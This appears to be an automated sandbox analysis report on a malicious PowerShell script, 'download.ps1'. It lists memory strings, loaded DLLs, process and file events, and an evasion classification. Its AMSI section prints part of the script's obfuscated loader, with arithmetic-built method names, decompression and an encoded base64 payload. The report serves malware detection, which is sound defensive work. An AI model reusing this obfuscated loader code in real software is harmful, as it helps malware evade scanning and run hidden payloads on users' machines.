Source: powershell.exe, 00000000.00000002.48229130309.000002C3DCE3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCECE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCF5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CCE8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CD210000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CD097000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCC61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CD210000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comXz
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d'
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: e.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABd-image:none;border-color:;color:!important}#gbprc .gbprcbc:hover{color:!important}#gbprc .gbprcbc:active,#gbprc .gbprcbc:focus{color:!important}.gbprct{color:#666;line-height:17px;margin:0;margin-bottom:20px}.gbprci{color:#333;font-size:16px;line-height:20px;margin:0;margin-bottom:16px}#gbprc .gbm
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u=/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CD210000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w'
Source: powershell.exe, 00000000.00000002.48209852284.000002C3CDBFD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basejs:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA
Source: powershell.exe, 00000000.00000002.48229130309.000002C3DCE3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCECE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCF5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CCE8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48209852284.000002C3CD097000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48229130309.000002C3DCC61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ3qzyKBayzRM1Tb0n3R1AfU2t-svcedm" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="SW-sv7i-eaS8-XCWYx_-eg">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br><div id="K7FuCf"><style>.U8K5Lc{font-size:small;margin-bottom:32px}.U8K5Lc a.qDTOof{display:inline-block;text-decoration:none}.U8K5Lc img{border:none;margin-right:5px;vertical-align:middle}</style><div class="U8K5Lc" data-ved="0ahUKEwjghc6Z896KAxVqm4kEHbrnCQQQnIcBCAU"><img alt="" height="32" src="https://www.google.com/images/hpp/YT_RedPlayButton_Icon_48x48.png" width="32"><span>Score one final special offer for </span><a href="https://www.google.com/url?q=https://tv.youtube.com/learn/nflsundayticket/%3Futm_campaign%3Dytnflst_jan25_nflst_w18_hpp_q1_2025%26utm_source%3Dhpp%26utm_medium%3Dgoogle%26utm_content%3Dcpy1&amp;source=hpp&amp;id=19046161&amp;ct=3&amp;usg=AOvVaw0o2kBUsvWMu1ycqjGPCIBX&amp;sa=X&amp;ved=0ahUKEwjghc6Z896KAxVqm4kEHbrnCQQQ8IcBCAY" rel="nofollow">NFL Sunday Ticket</a></div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2025 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="SW-sv7i-eaS8-XCWYx_-eg">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="SW-sv7i-eaS8-XCWYx_-eg">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE
Source: classification engineClassification label: mal72.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3448:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3448:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5e0xt3fb.yax.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $7edjaqr905cnyhb.(([system.String]::new(@((24857/371),(-8911+(2840+(6018+(-8231+(11897-3502))))),(-9023+9135),(-5924+(36699195/(4502+1569))),(1836-(9275-7523)),(-2126+(4160-(-4911+6834)))))))( $4157m6iesh3l8nu ) $7edjaqr905cnyhb.(([char[]]@((2050-1983),(1029780/9535),(415917/3747),(8588-8473),(4736-(13338-(65742462/(12446-(44541660/(12215-(26332370/(41361295/(87+4798)))))))))) -join ''))()$i1jzloy6bdp4n9g.(([system.String]::new(@((8197-(28105410/3457)),(2358-2250),(1137084/(69782128/(10117-(7310-4005)))),(133055/(10695308/(26742892/2893))),(910818/(65344428/7246))))))()[byte[]] $jv31ztaxlfu80mo = $4157m6iesh3l8nu.(([char[]]@((-7975+8059),(3155-(960+(1118+966))),(281320/(4162+166)),(-6032+6146),(-7773+7887),(-3892+(-58+(6865-2818))),(-4586+4707)) -join ''))() $6nfw8ys0lvebhat=$jv31ztaxlfu80mo return $6nfw8ys0lvebhat}[System.Text.Encoding]::ascii.((-join (@((227342/3202),(587416/5816),(116232/1002),(253814/3058),(97324/839),(1371-1257),(571830/5446),(1732-(-3810+(30794008/5669))),(12257/119))| ForEach-Object { [char]$_ })))((p7v3f419gblk0iomyrjz6tuw5d8 "buI5ZmM2emF8c8/5KuZlMRXx5eK8BEo8Fc8bAW1RpU4+W/ND6FVUIOkpiAHZ26NgRV3s3gpa9oyX7b0anDp8JbBq1rlLM1cw1p/oHc7JH8wND5mzHJLGqPClyeY/VL37zbXOnofanXaPnI66nXaM2FsIQRwMBRjUDhpAia15dT5GTl0cj5H89XSR1a6WHJ0WDljOsaiJ5NwAipgHDpfso7LzkTbDyLlqXhxGnZ6dJT8lnz25jIfTmpvCs+IXzF+4jtXM0Y6AvLOeHmzYPbKrPPtFjBjPqJ8ASr6vvLdqFN2YfhOrzw/PuhFHiVduJD7pECCQUt6JzY+fHspYgzqGChoPgz+qyzoNxCRqiVDho6dmOUpbXbJvxBQPV6CDy9ESN/5zzqjgPf4hOIYq3USIUDXjWH6MOK+rmqQUozWhYjKcJpLJ/eKX8FEds1jdLb+nM/VMsLTQHD7irfnGkhZtWoZinD87x02KzeEcc86zNxqMh4qZim4+vkTYDK9WqM+dI88hPNJ70N83qPwm696cAlXwiRy9RnR7w4qv5SxLjFzOrgy5EB+Qq8pxp6GkIW22J577iFvhw2EzPzEP38cqNGBdGN6MonTPuqKHMFSTqsqGTVp6lwQY+gCcT91DyQ+QUCTqX9kGi8bJdD5MgqphVdQvqTOhPJ9ZtPOqPQGZQI+gq8sIv8TGhHX5GJmIFRwTBxWLn5CpDVY9oAQ+qYtv8X1srfbdnZihjE9KhxGr6Nbb6ckutf+MT4WiXffdZLNi86GKoDRQ9CZj5EUrA+T4iACrAKnCE8374kJv+TACyxJNNq1bV9eEA76ulE1BTMVdpzl6zXB3Lv2LFpPLV9Jd6OplmtprZELn2wsGQ1w4+opNPfHlA7OAMomM7DXMZf/G/tRau92Qw1S9WQ2FTbTVn8Irhowj3BxbzxHFEhjRmJ2NDZWOnDLOkogxg93hhF0Lx7KpDED2YcitiAy7H3JIxTbx1o4ITdiDqPIjXFx4wwaW5rU/2YezpmsYU0qu67lMXlR48fjoPA3Ijj8agJLXsVgJxtwAiYSsXua+kFwJ4Y+LjlxRB0umtrt6zE7snYgnQ/gSoskd95KtkqavkJ1nE8pN4eafiMGChl+OuRdVDL5njqAjs48hb/0cCkFeyhuqHjMIL71LiSSQsryOfPjR6GOxHcLuZcm4V87X5JH5LVdee2UnpYLtFE2qTB6rGPvs3aqHGqKsZX7lz5id07DdhjpzkGPO1T0PWjp4I9IMF9axYrXkJbM4BjotIbexQf8E21DAVAif9Mz1gpjvibas8dzKzh6DkZyz8ZdOOH/JmYDLjsHuvI8LpuzSbsW39pkARFD2xP/+6x0X1mS6Ywjdr2PUAWRboxgLsHngwyv0fOIAk8Ri1DbhOGCnePMs+IBurUnnpywxhNLTXQQKqvfw34nMwNiyeb12mI2MSfVxqmoRt0veKymvCKslICvCb7v58N+oJob94I71U7HMBBtDiNrCj8vpuJjgkY3+43D5pHqAVCIKkOGy5wE//iGIdfnMxU97TP95Hq4/BeS5fRo6zYH1e0tsUjaLW3vv20jIgobPvr2rv5bSjrLlA7yFLFUjfWbfmozQDcLxaNrQYBALEmP1L5prKrrDIQKEfUJ8w5J8us+e13SaCsE1G6V1zx9n2vNA8SgFlvh02Cm3pBV91nSxUF1gS7RmWKLk5lCI3+wzZXT3cVKQ+xssDEW/xwulEIOoxVMm56iTTRdytuLb54vQ9+cWNZ5pVabB9JWP3idM4MJVEWB6Z/m6iqGK6pE2FZgSNDNO1OlTLUL6EQsB2Gw8NMNaxeitaBbDw5lHTOUf2oDQu8ZxWR/0ezf9Srb6F0vaO5P7Pjt
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: download.ps1Virustotal: Detection: 11%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb} source: powershell.exe, 00000000.00000002.48236697992.000002C3E5172000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.48236697992.000002C3E512D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000000.00000002.48237450709.000002C3E53A9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.48236697992.000002C3E518C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.48236697992.000002C3E50E5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ll\mscorlib.pdbZ source: powershell.exe, 00000000.00000002.48235434186.000002C3E502C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb] source: powershell.exe, 00000000.00000002.48236697992.000002C3E5172000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbH source: powershell.exe, 00000000.00000002.48236697992.000002C3E518C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbQ source: powershell.exe, 00000000.00000002.48236697992.000002C3E512D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbL source: powershell.exe, 00000000.00000002.48237450709.000002C3E53BF000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFF3CA4D2A5 pushad ; iretd 0_2_00007FFF3CA4D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFF3CB60CE9 push esi; ret 0_2_00007FFF3CB60CEA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFF3CB67507 push ebx; iretd 0_2_00007FFF3CB6754A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFF3CB600BD pushad ; iretd 0_2_00007FFF3CB600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFF3CB60DF2 push eax; ret 0_2_00007FFF3CB60DF3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFF3CC354DF push esp; ret 0_2_00007FFF3CC354E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFF3CC354E9 push edi; ret 0_2_00007FFF3CC354EA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFF3CC36055 pushad ; ret 0_2_00007FFF3CC36062
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFF3CC34E13 push eax; ret 0_2_00007FFF3CC34E1A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFF3CC339B6 push eax; ret 0_2_00007FFF3CC339C2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFF3CC38179 push eax; ret 0_2_00007FFF3CC3818A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFF3CC3119D push eax; ret 0_2_00007FFF3CC311BA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFF3CC3512D push ecx; ret 0_2_00007FFF3CC35142
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFF3CC34D4D push eax; retf 0_2_00007FFF3CC34D4E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFF3CC35EE3 pushad ; ret 0_2_00007FFF3CC35EEA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFF3CC3527D push edx; ret 0_2_00007FFF3CC35292
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFF3CC35293 push ebx; ret 0_2_00007FFF3CC3529A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFF3CC31BD3 push eax; ret 0_2_00007FFF3CC31C32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFF3CC35358 push esp; ret 0_2_00007FFF3CC3535A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFF3CC3534D push ebx; ret 0_2_00007FFF3CC35352
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFF3CE14D4E pushad ; iretd 0_2_00007FFF3CE14D4F

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
